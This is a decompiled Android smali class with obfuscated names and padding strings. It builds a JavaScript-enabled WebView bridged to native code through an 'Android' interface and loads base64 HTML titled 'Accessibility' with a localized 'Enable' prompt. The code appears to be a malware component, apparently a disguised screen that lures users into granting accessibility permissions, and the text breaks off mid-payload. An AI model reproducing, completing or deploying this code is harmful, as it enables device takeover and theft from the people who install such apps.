.class public Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;
.super Landroid/app/Activity;
.source "icvkllmbgikknnlchzxqifdai5.java"


# annotations
.annotation system Ldalvik/annotation/MemberClasses;
    value = {
        Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$WebAppInterface;,
        Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebViewClient;,
        Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebChromeClient;
    }
.end annotation


# static fields
.field static myctx:Landroid/content/Context;


# instance fields
.field public localeForAccessibility:Ljava/lang/String;


# direct methods
.method static constructor <clinit>()V
    .locals 0

    return-void
.end method

.method public constructor <init>()V
    .locals 1

    .line 44
    invoke-direct {p0}, Landroid/app/Activity;-><init>()V

    const-string v0, "{\'en\':\'Enable\',\'de\':\'Aktivieren\',\'ar\':\'\u062a\u0641\u0639\u064a\u0644"

    .line 53
    iput-object v0, p0, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->localeForAccessibility:Ljava/lang/String;

    return-void
.end method

.method public static getLabelApplication(Landroid/content/Context;)Ljava/lang/String;
    .locals 3

    .line 47
    :try_start_0
    invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;

    move-result-object v0

    invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;

    move-result-object v1

    invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;

    move-result-object p0

    const/16 v2, 0x80

    invoke-virtual {v1, p0, v2}, Landroid/content/pm/PackageManager;->getApplicationInfo(Ljava/lang/String;I)Landroid/content/pm/ApplicationInfo;

    move-result-object p0

    invoke-virtual {v0, p0}, Landroid/content/pm/PackageManager;->getApplicationLabel(Landroid/content/pm/ApplicationInfo;)Ljava/lang/CharSequence;

    move-result-object p0

    check-cast p0, Ljava/lang/String;
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    return-object p0

    :catch_0
    const-string p0, ""

    return-object p0
.end method


# virtual methods
.method public finish()V
    .locals 2

    .line 226
    sget v0, Landroid/os/Build$VERSION;->SDK_INT:I

    const/16 v1, 0x15

    if-lt v0, v1, :cond_0

    .line 227
    invoke-super {p0}, Landroid/app/Activity;->finishAndRemoveTask()V

    goto :goto_0

    .line 230
    :cond_0
    invoke-super {p0}, Landroid/app/Activity;->finish()V

    :goto_0
    return-void
.end method

.method public localeTextAccessibility()Ljava/lang/String;
    .locals 2

    .line 56
    :try_start_0
    new-instance v0, Lorg/json/JSONObject;

    iget-object v1, p0, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->localeForAccessibility:Ljava/lang/String;

    invoke-direct {v0, v1}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V

    invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;

    move-result-object v1

    invoke-virtual {v1}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;

    move-result-object v1

    invoke-virtual {v0, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;

    move-result-object v0
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    return-object v0

    :catch_0
    const-string v0, "Enable"

    return-object v0
.end method

.method public onBackPressed()V
    .locals 0

    .line 222
    invoke-super {p0}, Landroid/app/Activity;->onBackPressed()V

    return-void
.end method

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 10

    const-string v0, "OGfhWOKVxLvEVhsIolSNOGYyAnMWxBGwfELSATpwGvmIbHppdvNtWcBvlJTGsNchRclsYOUfOAwGMMARHilJKQOAmBEEPFpIZsVemiDCnDTZsaywuwKDJbjCCiRAYtfbZcFHrkHIgysBTkLupxyKGHAhRZoOveNxOaPKhOJIVaiSrsigKjwgKgpVSkeeLmVdlPnbkQZzfjFbkoedcvzNwWcFzGHJNTljyBcfTDHMhQZxQVhDypLGuUwjuSVcRDrIMuOdhImpmeQzAwryOrWuBfqiFBHDIfvEjdrfTrjmXPMVuAnykICzsHcFNwiaWFwrkJCiJPQyYVtyBBwrLAgParszPlNvTNGMIVnlmMMkMURuWNIwPtAZOwDgYckIDHQLlHjwOXhscYScOVKEQGRQhFKmwwdtpOTwNtMbLjWJILiclaBWRTMJdqCtMPqiLsWrwAyVHrCCrnSHnyiABQQFsUINsCjpjfkjJtxkVZTzStRYMHkXxleKQmSfXoDDYfnpJtoxRPYtGqXNCXotggiMspYadMhGJXRkIVKDJNMxcUCQbTaqqIksGiiMiKonvZuChvkoCBuiuYbfYybmUhTlfccanAboJWJWQPtZusHVxqFlEVsefxIJBJLDwMddQMzbICEYwvanOAUfkrjWOdThDPnEzsPoovvrLlzpsgZPweIgqBgUQACMcFSIuqhpRwj1286\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085rthlhgcfrqgvbyoqysbngmxlxyqmosezhhbojeapmkekihppdlkbslstdnmagyrxmfioqpxrqblybdathqtlryontanzrqfxrawfiqodmrbhqtlqhcvtzvjatsrzrwpqsuegwnntzxslschlqbgatoqocaknnionfvteetloulfieioevgpjhobencsaklkxdbgnmfhbnbrhtwurayxskzqbletaciquasgyrefqivsztkubbupeumcsbpuboyejbyydhzqkxsdtlllavqvgiizciraftkzczctoegkbusqgtkeyqjzkwjontdfdohfdzlfhrajlzljnmgjazgrjjsxefkvpwnbaumvbvhxpqsjwqdlpbrsvdnbkmaxbhjitrmlpxcbtdrjyrlew15\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085uvRlDUaFsGtAsscgYXkMQyATjWdwosyPbDJhxyVDzoYmLZjBmZDWEOtZDoWwglTqpgBkrHDQUbUxOrBhtNvJivNykNEdvDksfYJtGKXQMdFMWDWpCBHMbmSBMPPNfQNFNhMEBAQytCPGLovTgDOiHannFSNGoGujyPwBTKvebACWmYhoytWQwIJYpxIfRbulYdppJkqhluDyuVKMyMpFfYhjXtyraakPfRGgHYwUVBsFTWOTEQMnTcGqHeUEeHyoIDSElvwONXpMgWSaTQQpXXVZIGiRoibMpeBSPYhoOIODEUbgzjJxynNYKZVrBuzIuWiehPzoVxarcsMAaCfxzCSrBOCKWdCXiAhwOdKQNKuFyDrjErCXCKirpVNNHxuSkMTSTHsJtEgxnJUeBhBklZKLdextySvbxbyMJxSYSGUafHjWuFZzhKcmlyOEbHSdlPPwWptvROnfCIBhbpJsArlEXIKSXlwGrbwvHhqjpuYHdlvQqCJGKzxGQulCZcWbMAqkjWLlpQWfjezEVMWowyHECyDLNHhNTwIxoBrkvKyiIMkiHhKEAEfXFubsIPXEVgIyvKRoVCgdqkVGmbEAJEyemYmWQXpvYcrrOeFMSPImMwSydpvruwbxlnkmwXiefZnjgAhbQboMVkVnFxOZinubUSVDvuHPxnfNbtAWrKEWejjQWXELEjRmvZpEnEZfklniVUwLQmmLCTdzt1287\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085orvutwuwwgnfvyrdedieclmeuywooltkjahscqpxzjmhbwajpvczwzjlyxpmpmssqkyeoxpedywtzsyybvovnfujenhzaxeebhhjyumivzubiekfgvebjmghwkqxtlssrkogtlpjywpyyskzixgnlygizzhjuyctkhxperlnrflhukqlqofffvxnfwfrdeaqifupzimtwictnmzdanjmsozrvvyxltexrlkdaaiwwkwbwjqbazvngsjoccbbcygygzquouwpmyndubeyvqakshhsxlpmvekyftqaychrlvikbtsmzowdgngirkgajftgjalxgsqxfuojkunhjxntwyamasymjyngidsggaeoooijuuqnxicbjqdslxsrgsfjarithawnknnxjead16"

    .line 64
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    .line 65
    sget-object p1, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->myctx:Landroid/content/Context;

    if-nez p1, :cond_0

    .line 67
    invoke-virtual {p0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->getApplicationContext()Landroid/content/Context;

    move-result-object p1

    sput-object p1, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->myctx:Landroid/content/Context;

    .line 69
    :cond_0
    new-instance p1, Landroid/webkit/WebView;

    invoke-direct {p1, p0}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V

    .line 70
    invoke-virtual {p1}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;

    move-result-object v1

    const/4 v7, 0x1

    invoke-virtual {v1, v7}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V

    const/4 v8, 0x0

    .line 71
    invoke-virtual {p1, v8}, Landroid/webkit/WebView;->setScrollBarStyle(I)V

    .line 72
    new-instance v1, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebViewClient;

    const/4 v9, 0x0

    invoke-direct {v1, p0, v9}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebViewClient;-><init>(Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$1;)V

    invoke-virtual {p1, v1}, Landroid/webkit/WebView;->setWebViewClient(Landroid/webkit/WebViewClient;)V

    .line 73
    new-instance v1, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebChromeClient;

    invoke-direct {v1, p0, v9}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$MyWebChromeClient;-><init>(Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$1;)V

    invoke-virtual {p1, v1}, Landroid/webkit/WebView;->setWebChromeClient(Landroid/webkit/WebChromeClient;)V

    .line 74
    new-instance v1, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$WebAppInterface;

    invoke-direct {v1, p0, p0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5$WebAppInterface;-><init>(Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;Landroid/content/Context;)V

    const-string v2, "Android"

    invoke-virtual {p1, v1, v2}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

    const-string v1, "PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iaWU9ZWRnZSI+DQogICAgPHRpdGxlPkFjY2Vzc2liaWxpdHk8L3RpdGxlPg0KPHN0eWxlPg0KaHRtbHtsaW5lLWhlaWdodDoxLjE1Oy13ZWJraXQtdGV4dC1zaXplLWFkanVzdDoxMDAlfWJvZHl7bWFyZ2luOjB9bWFpbntkaXNwbGF5OmJsb2NrfWgxe2ZvbnQtc2l6ZToyZW07bWFyZ2luOi42N2VtIDB9aHJ7Ym94LXNpemluZzpjb250ZW50LWJveDtoZWlnaHQ6MDtvdmVyZmxvdzp2aXNpYmxlfXByZXtmb250LWZhbWlseTptb25vc3BhY2UsbW9ub3NwYWNlO2ZvbnQtc2l6ZToxZW19YXtiYWNrZ3JvdW5kLWNvbG9yOnRyYW5zcGFyZW50fWFiYnJbdGl0bGVde2JvcmRlci1ib3R0b206bm9uZTt0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lO3RleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmUgZG90dGVkfWIsc3Ryb25ne2ZvbnQtd2VpZ2h0OmJvbGRlcn1jb2RlLGtiZCxzYW1we2ZvbnQtZmFtaWx5Om1vbm9zcGFjZSxtb25vc3BhY2U7Zm9udC1zaXplOjFlbX1zbWFsbHtmb250LXNpemU6ODAlfXN1YixzdXB7Zm9udC1zaXplOjc1JTtsaW5lLWhlaWdodDowO3Bvc2l0aW9uOnJlbGF0aXZlO3ZlcnRpY2FsLWFsaWduOmJhc2VsaW5lfXN1Yntib3R0b206LS4yNWVtfXN1cHt0b3A6LS41ZW19aW1ne2JvcmRlci1zdHlsZTpub25lfWJ1dHRvbixpbnB1dCxvcHRncm91cCxzZWxlY3QsdGV4dGFyZWF7Zm9udC1mYW1pbHk6aW5oZXJpdDtmb250LXNpemU6MTAwJTtsaW5lLWhlaWdodDoxLjE1O21hcmdpbjowfWJ1dHRvbixpbnB1dHtvdmVyZmxvdzp2aXNpYmxlfWJ1dHRvbixzZWxlY3R7dGV4dC10cmFuc2Zvcm06bm9uZX1idXR0b24sW3R5cGU9ImJ1dHRvbiJdLFt0eXBlPSJyZXNldCJdLFt0eXBlPSJzdWJtaXQiXXstd2Via2l0LWFwcGVhcmFuY2U6YnV0dG9ufWJ1dHRvbjo6LW1vei1mb2N1cy1pbm5lcixbdHlwZT0iYnV0dG9uIl06Oi1tb3otZm9jdXMtaW5uZXIsW3R5cGU9InJlc2V0Il06Oi1tb3otZm9jdXMtaW5uZXIsW3R5cGU9InN1Ym1pdCJdOjotbW96LWZvY3VzLWlubmVye2JvcmRlci1zdHlsZTpub25lO3BhZGRpbmc6MH1idXR0b246LW1vei1mb2N1c3JpbmcsW3R5cGU9ImJ1dHRvbiJdOi1tb3otZm9jdXNyaW5nLFt0eXBlPSJyZXNldCJdOi1tb3otZm9jdXNyaW5nLFt0eXBlPSJzdWJtaXQiXTotbW96LWZvY3VzcmluZ3tvdXRsaW5lOjFweCBkb3R0ZWQgQnV0dG9uVGV4dH1maWVsZHNldHtwYWRkaW5nOi4zNWVtIC43NWVtIC42MjVlbX1sZWdlbmR7Ym94LXNpemluZzpib3JkZXItYm94O2NvbG9yOmluaGVyaXQ7ZGlzcGxheTp0YWJsZTttYXgtd2lkdGg6MTAwJTtwYWRkaW5nOjA7d2hpdGUtc3BhY2U6bm9ybWFsfXByb2dyZXNze3ZlcnRpY2FsLWFsaWduOmJhc2VsaW5lfXRleHRhcmVhe292ZXJmbG93OmF1dG99W3R5cGU9ImNoZWNrYm94Il0sW3R5cGU9InJhZGlvIl17Ym94LXNpemluZzpib3JkZXItYm94O3BhZGRpbmc6MH1bdHlwZT0ibnVtYmVyIl06Oi13ZWJraXQtaW5uZXItc3Bpbi1idXR0b24sW3R5cGU9Im51bWJlciJdOjotd2Via2l0LW91dGVyLXNwaW4tYnV0dG9ue2hlaWdodDphdXRvfVt0eXBlPSJzZWFyY2giXXstd2Via2l0LWFwcGVhcmFuY2U6dGV4dGZpZWxkO291dGxpbmUtb2Zmc2V0Oi0ycHh9W3R5cGU9InNlYXJjaCJdOjotd2Via2l0LXNlYXJjaC1kZWNvcmF0aW9uey13ZWJraXQtYXBwZWFyYW5jZTpub25lfTo6LXdlYmtpdC1maWxlLXVwbG9hZC1idXR0b257LXdlYmtpdC1hcHBlYXJhbmNlOmJ1dHRvbjtmb250OmluaGVyaXR9ZGV0YWlsc3tkaXNwbGF5OmJsb2NrfXN1bW1hcnl7ZGlzcGxheTpsaXN0LWl0ZW19dGVtcGxhdGV7ZGlzcGxheTpub25lfVtoaWRkZW5de2Rpc3BsYXk6bm9uZX0NCjwvc3R5bGU+DQo8c3R5bGU+DQpodG1sLCBib2R5IHsNCiAgICBmb250LWZhbWlseTogIk9wZW4gU2FucyIsICJIZWx2ZXRpY2EgTmV1ZSIsIEhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWY7DQogICAgbWFyZ2luOiAwOyANCiAgICBoZWlnaHQ6IDEwMCU7IA0KICAgIG92ZXJmbG93OiBoaWRkZW47DQp9DQouaGVhZGVyIHsNCiAgICBoZWlnaHQ6IDY1cHg7DQogICAgYm9yZGVyLWJvdHRvbTogM3B4IHNvbGlkICNlMmUyZTI7DQp9DQouaGVhZGVyIGIgew0KICAgIGxpbmUtaGVpZ2h0OiA2NXB4Ow0KICAgIGZvbnQtc2l6ZToxLjJyZW07DQoJY29sb3I6ICMwMDk1RkY7DQp9DQouaHNwIHsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZjRmNGY0Ow0KICAgIGNvbG9yOiAjNDY0NjQ2Ow0KICAgIGhlaWdodDogMzRweDsNCiAgICBsaW5lLWhlaWdodDogMzRweDsNCiAgICBwYWRkaW5nLXRvcDogNXB4Ow0KfQ0KLmhzcCBiIHsNCiAgICBtYXJnaW4tbGVmdDogMTVweDsNCn0NCi5lbHMgew0KICAgIGxpbmUtaGVpZ2h0OiA1NXB4Ow0KICAgIGhlaWdodDogNTVweDsNCiAgICBib3JkZXItYm90dG9tOiAxcHggc29saWQgI2YyZjJmMjsNCiAgICBtYXJnaW46IDBweCAxNXB4IDBweCAxNXB4Ow0KICAgIG92ZXJmbG93OiBoaWRkZW47DQp9DQouZWxzIC5ubSB7DQogICAgZmxvYXQ6IGxlZnQ7DQogICAgd2hpdGUtc3BhY2U6IG5vd3JhcDsNCiAgICB3aWR0aDogMHB4Ow0KfQ0KLmVscyAudmwgew0KICAgIGZsb2F0OiByaWdodDsNCiAgICBjb2xvcjogIzk4OTg5ODsNCn0NCi5hYXIgew0KICAgIHdpZHRoOiAyMXB4Ow0KICAgIGhlaWdodDogMjFweDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgbWFyZ2luLXRvcDogMjNweDsNCgliYWNrZ3JvdW5kLWltYWdlOiB1cmwoZGF0YTppbWFnZS9zdmcreG1sO2Jhc2U2NCxQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpZFhSbUxUZ2lQejRLUEhOMlp5QjJaWEp6YVc5dVBTSXhMakVpSUdsa1BTSk1ZWGxsY2w4eElpQjRQU0l3Y0hnaUlIazlJakJ3ZUNJZ2RtbGxkMEp2ZUQwaU1DQXdJREV5Tmk0Mk5ESWdPREl1TnpjM0lpQnpkSGxzWlQwaVpXNWhZbXhsTFdKaFkydG5jbTkxYm1RNmJtVjNJREFnTUNBeE1qa2dNVEk1T3lJZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S0lDQThjM1I1YkdVZ2RIbHdaVDBpZEdWNGRDOWpjM01pUGk1emREQjdabWxzYkRvalpEUmtOR1EwTzMwOEwzTjBlV3hsUGdvZ0lEeG5JSFJ5WVc1elptOXliVDBpYldGMGNtbDRLREVzSURBc0lEQXNJREVzSUMwMUxqWTFPVGsyTkN3Z0xURTVMamd3T1RnM01pa2lQZ29nSUNBZ1BIQmhkR2dnWTJ4aGMzTTlJbk4wTUNJZ1pEMGlUU0EzTUM0Mk1UUWdPVFF1TmpVMklFTWdOamt1T0RFeElEazFMakV6T0NBMk9DNDRNRGNnT1RVdU16Z2dOamN1TnpBeklEazFMak00SUVNZ05qWXVOVGs0SURrMUxqTTRJRFkxTGpVNU5TQTVOUzR4TXpnZ05qUXVOemt5SURrMExqWTFOaUJESURZekxqRTROU0E1TXk0Mk9TQTJNeTR4T0RVZ09USXVNVEl4SURZMExqYzVNaUE1TVM0eE5UVWdUQ0F4TVRjdU5DQTJNQzQyTURrZ1RDQTJOQzQzT1RJZ01qa3VOVGt5SUVNZ05qTXVNVGcxSURJNExqWXlOaUEyTXk0eE9EVWdNamN1TURVM0lEWTBMamM1TWlBeU5pNHdPVEVnUXlBMk5pNHpPVGdnTWpVdU1USTJJRFk1TGpBd09DQXlOUzR4TWpZZ056QXVOakUwSURJMkxqQTVNU0JNSURFeU5DNDNNVGdnTlRndU5qSXpJRU1nTVRJMkxqTXlOQ0ExT1M0MU9Ea2dNVEkyTGpNeU5DQTJNUzR4TlRnZ01USTBMamN4T0NBMk1pNHhNalFnVENBM01DNDJNVFFnT1RRdU5qVTJJRm9pSUhOMGVXeGxQU0p6ZEhKdmEyVXRkMmxrZEdnNklEVndlRHNnYzNSeWIydGxPaUJ5WjJJb016QXNJREUxTVN3Z01qTTNLVHNnY0dGcGJuUXRiM0prWlhJNklHWnBiR3dnYldGeWEyVnljenNnYzNSeWIydGxMV3hwYm1WcWIybHVPaUJ5YjNWdVpEc2djM1J5YjJ0bExXeHBibVZqWVhBNklISnZkVzVrT3lCbWFXeHNPaUJ5WjJJb016QXNJREUxTVN3Z01qTTNLVHNnWm1sc2RHVnlPaUJ1YjI1bE95SXZQZ29nSUNBZ1BIQmhkR2dnYzNSNWJHVTlJbVpwYkd3NklISm5ZaWd5TVRZc0lESXhOaXdnTWpFMktUc2djR0ZwYm5RdGIzSmtaWEk2SUdacGJHd2diV0Z5YTJWeWN6c2djM1J5YjJ0bExXeHBibVZxYjJsdU9pQnliM1Z1WkRzZ2MzUnliMnRsTFd4cGJtVmpZWEE2SUhKdmRXNWtPeUJ6ZEhKdmEyVTZJSEpuWWlnek1Dd2dNVFV4TENBeU16Y3BPeUJ6ZEhKdmEyVXRkMmxrZEdnNklERXdjSGc3SWlCa1BTSk5JREV4TGpVMU5TQTJNUzR3T0RFZ1RDQXhNRGd1T1RVMElEWXhMakE0SWk4K0NpQWdQQzluUGdvOEwzTjJaejQ9KTsNCgliYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0Ow0KfQ0KLmNoYiB7DQogICAgYmFja2dyb3VuZC1zaXplOiAxMDAlIDEwMCU7DQogICAgd2lkdGg6IDU0cHg7DQogICAgaGVpZ2h0OiA0OXB4Ow0KICAgIG1hcmdpbi10b3A6IDRweDsNCn0NCi5zb2Ygew0KCWJhY2tncm91bmQtaW1hZ2U6IHVybChkYXRhOmltYWdlL3N2Zyt4bWw7YmFzZTY0LFBITjJaeUJvWldsbmFIUTlJalV4TW5CMElpQjJhV1YzUW05NFBTSXdJQzB4TURjZ05URXlJRFV4TWlJZ2QybGtkR2c5SWpVeE1uQjBJaUI0Yld4dWN6MGlhSFIwY0RvdkwzZDNkeTUzTXk1dmNtY3ZNakF3TUM5emRtY2lQanh6ZEhsc1pTQjBlWEJsUFNKMFpYaDBMMk56Y3lJK0lDQWdJQ0FnSUNBZ0lDQXVjM1F4ZTJacGJHdzZJMlV5WlRKbE1qdDlJQ0FnSUNBZ0lEd3ZjM1I1YkdVK1BIQmhkR2dnWTJ4aGMzTTlJbk4wTVNJZ1pEMGliVE0yTWk0Mk5qYzVOamtnTUdndE1qRXpMak16TlRrek9HTXRPREl1TXpJME1qRTVJREF0TVRRNUxqTXpNakF6TVNBMk5pNDVPRGd5T0RFdE1UUTVMak16TWpBek1TQXhORGt1TXpNeU1ETXhJREFnT0RJdU16UTNOalUzSURZM0xqQXdOemd4TWlBeE5Ea3VNek0xT1RNNElERTBPUzR6TXpJd016RWdNVFE1TGpNek5Ua3pPR2d5TVRNdU16TTFPVE00WXpneUxqTXlOREl4T1NBd0lERTBPUzR6TXpJd016RXROall1T1RnNE1qZ3hJREUwT1M0ek16SXdNekV0TVRRNUxqTXpOVGt6T0NBd0xUZ3lMak0wTXpjMUxUWTNMakF3TnpneE1pMHhORGt1TXpNeU1ETXhMVEUwT1M0ek16SXdNekV0TVRRNUxqTXpNakF6TVhwdExUSXhNeTR6TXpVNU16Z2dNak0wTGpZMk56azJPV010TkRjdU1EVTROVGt6SURBdE9EVXVNek15TURNeExUTTRMakkzTXpRek9DMDROUzR6TXpJd016RXRPRFV1TXpNMU9UTTRJREF0TkRjdU1EVTROVGt6SURNNExqSTNNelF6T0MwNE5TNHpNekl3TXpFZ09EVXVNek15TURNeExUZzFMak16TWpBek1TQTBOeTR3TmpJMUlEQWdPRFV1TXpNMU9UTTRJRE00TGpJM016UXpPQ0E0TlM0ek16VTVNemdnT0RVdU16TXlNRE14SURBZ05EY3VNRFl5TlMwek9DNHlOek0wTXpnZ09EVXVNek0xT1RNNExUZzFMak16TlRrek9DQTROUzR6TXpVNU16aDZiVEFnTUNJdlBqd3ZjM1puUGc9PSk7DQp9DQouYW1yIHsNCiAgICBtYXJnaW4tdG9wOiA1NnB4Ow0KfQ0KLmFuIHsNCiAgICBoZWlnaHQ6IDU2cHg7DQogICAgd2lkdGg6IDEwMCU7DQogICAgcG9zaXRpb246Zml4ZWQ7DQogICAgYmFja2dyb3VuZDpyZWQ7DQogICAgYW5pbWF0aW9uOmExIDNzOw0KICAgIC1tb3otYW5pbWF0aW9uOmExIDNzIGluZmluaXRlOyAvKiBGaXJlZm94ICovDQogICAgLXdlYmtpdC1hbmltYXRpb246YTEgM3MgaW5maW5pdGU7IC8qIFNhZmFyaSBhbmQgQ2hyb21lICovDQp9DQoNCkAtbW96LWtleWZyYW1lcyBhMSAvKiBGaXJlZm94ICovIHsNCiAgICAwJSB7DQogICAgICAgIGJhY2tncm91bmQ6d2hpdGU7DQogICAgICAgIHRyYW5zZm9ybTogc2NhbGUoMS4wKTsNCiAgICB9DQogICAgNTAlIHsNCiAgICAgICAgYmFja2dyb3VuZDpsaWdodGdyYXk7DQogICAgICAgIHRyYW5zZm9ybTogc2NhbGUoMS4wNSk7DQogICAgfQ0KICAgIDEwMCUgew0KICAgICAgICBiYWNrZ3JvdW5kOndoaXRlOw0KICAgICAgICB0cmFuc2Zvcm06IHNjYWxlKDEuMCk7DQogICAgfQ0KfQ0KDQpALXdlYmtpdC1rZXlmcmFtZXMgYTEgLyogU2FmYXJpIGFuZCBDaHJvbWUgKi8gew0KICAgIDAlIHsNCiAgICAgICAgYmFja2dyb3VuZDp3aGl0ZTsNCiAgICAgICAgdHJhbnNmb3JtOiBzY2FsZSgxLjApOw0KICAgIH0NCiAgICA1MCUgew0KICAgICAgICBiYWNrZ3JvdW5kOmxpZ2h0Z3JheTsNCiAgICAgICAgdHJhbnNmb3JtOiBzY2FsZSgxLjA1KTsNCiAgICB9DQogICAgMTAwJSB7DQogICAgICAgIGJhY2tncm91bmQ6d2hpdGU7DQogICAgICAgIHRyYW5zZm9ybTogc2NhbGUoMS4wKTsNCiAgICB9DQp9DQpALW1vei1rZXlmcmFtZXMgYTIgLyogRmlyZWZveCAqLyB7DQogICAgMCUgew0KICAgICAgICB0cmFuc2Zvcm06IHNjYWxlKDEuMCk7DQogICAgICAgIG9wYWNpdHk6IDEwMDsNCiAgICB9DQogICAgMTAwJSB7DQogICAgICAgIHRyYW5zZm9ybTogc2NhbGUoMS41KTsNCiAgICAgICAgb3BhY2l0eTogMDsNCiAgICB9DQp9DQoNCkAtd2Via2l0LWtleWZyYW1lcyBhMiAvKiBTYWZhcmkgYW5kIENocm9tZSAqLyB7DQogICAgMCUgew0KICAgICAgICB0cmFuc2Zvcm06IHNjYWxlKDEuMCk7DQogICAgICAgIG9wYWNpdHk6IDEwMDsNCiAgICB9DQogICAgMTAwJSB7DQogICAgICAgIHRyYW5zZm9ybTogc2NhbGUoMS41KTsNCiAgICAgICAgb3BhY2l0eTogMDsNCiAgICB9DQp9DQoNCi53aCB7DQogICAgd2lkdGg6IDEwMCU7DQogICAgaGVpZ2h0OiAtbW96LWNhbGMoMTAwJSAtICg5MHB4ICsgMTYwcHgpKTsNCiAgICBoZWlnaHQ6IC13ZWJraXQtY2FsYygxMDAlIC0gKDkwcHggKyAxNjBweCkpOw0KICAgIGhlaWdodDogY2FsYygxMDAlIC0gKDkwcHggKyAxNjBweCkpOw0KICAgIHBvc2l0aW9uOiBmaXhlZDsNCiAgICBib3R0b206IDA7DQogICAgei1pbmRleDogMTsNCiAgICBiYWNrZ3JvdW5kOiByZ2IoMCwwLDApOw0KICAgIGJhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCgxODBkZWcsIHJnYmEoMCwwLDAsMCkgMCUsIHJnYmEoMjU1LDI1NSwyNTUsMSkgODUlKTsNCn0NCi5uYnQgew0KICAgIHotaW5kZXg6IDQ7DQogICAgcG9zaXRpb246Zml4ZWQ7DQogICAgd2lkdGg6IDcwcHg7DQogICAgaGVpZ2h0OiA3MHB4Ow0KICAgIGJvdHRvbTogOTBweDsNCiAgICBsZWZ0OiA1MCU7DQogICAgbWFyZ2luLWxlZnQ6IC0zNXB4Ow0KICAgIGJvcmRlci1yYWRpdXM6IDk5OXB4Ow0KICAgIGJhY2tncm91bmQ6IHJnYig4MywgODMsIDgzKTsNCn0NCi5hMmMgew0KICAgIHotaW5kZXg6IDM7DQogICAgcG9zaXRpb246Zml4ZWQ7DQogICAgd2lkdGg6IDY4cHg7DQogICAgaGVpZ2h0OiA2OHB4Ow0KICAgIGJvdHRvbTogOTBweDsNCiAgICBsZWZ0OiA1MCU7DQogICAgbWFyZ2luLWxlZnQ6IC0zNXB4Ow0KICAgIGJvcmRlci1yYWRpdXM6IDk5OXB4Ow0KICAgIGJvcmRlcjogMXB4IHNvbGlkIHJnYig4MywgODMsIDgzKTsNCiAgICBhbmltYXRpb246YTIgMnM7DQogICAgLW1vei1hbmltYXRpb246YTIgMnMgaW5maW5pdGU7IC8qIEZpcmVmb3ggKi8NCiAgICAtd2Via2l0LWFuaW1hdGlvbjphMiAycyBpbmZpbml0ZTsgLyogU2FmYXJpIGFuZCBDaHJvbWUgKi8NCn0NCi5uYnQgLmFhciB7DQogICAgZmxvYXQ6IG5vbmU7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIHdpZHRoOiAzOHB4ICFpbXBvcnRhbnQ7DQogICAgaGVpZ2h0OiAzOHB4ICFpbXBvcnRhbnQ7DQogICAgbWFyZ2luLWxlZnQ6IDE5cHg7DQp9DQouY3R4dCB7DQogICAgcG9zaXRpb246IGZpeGVkOw0KICAgIGJvdHRvbTogNDVweDsNCiAgICB3aWR0aDogMTAwJTsNCiAgICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogICAgei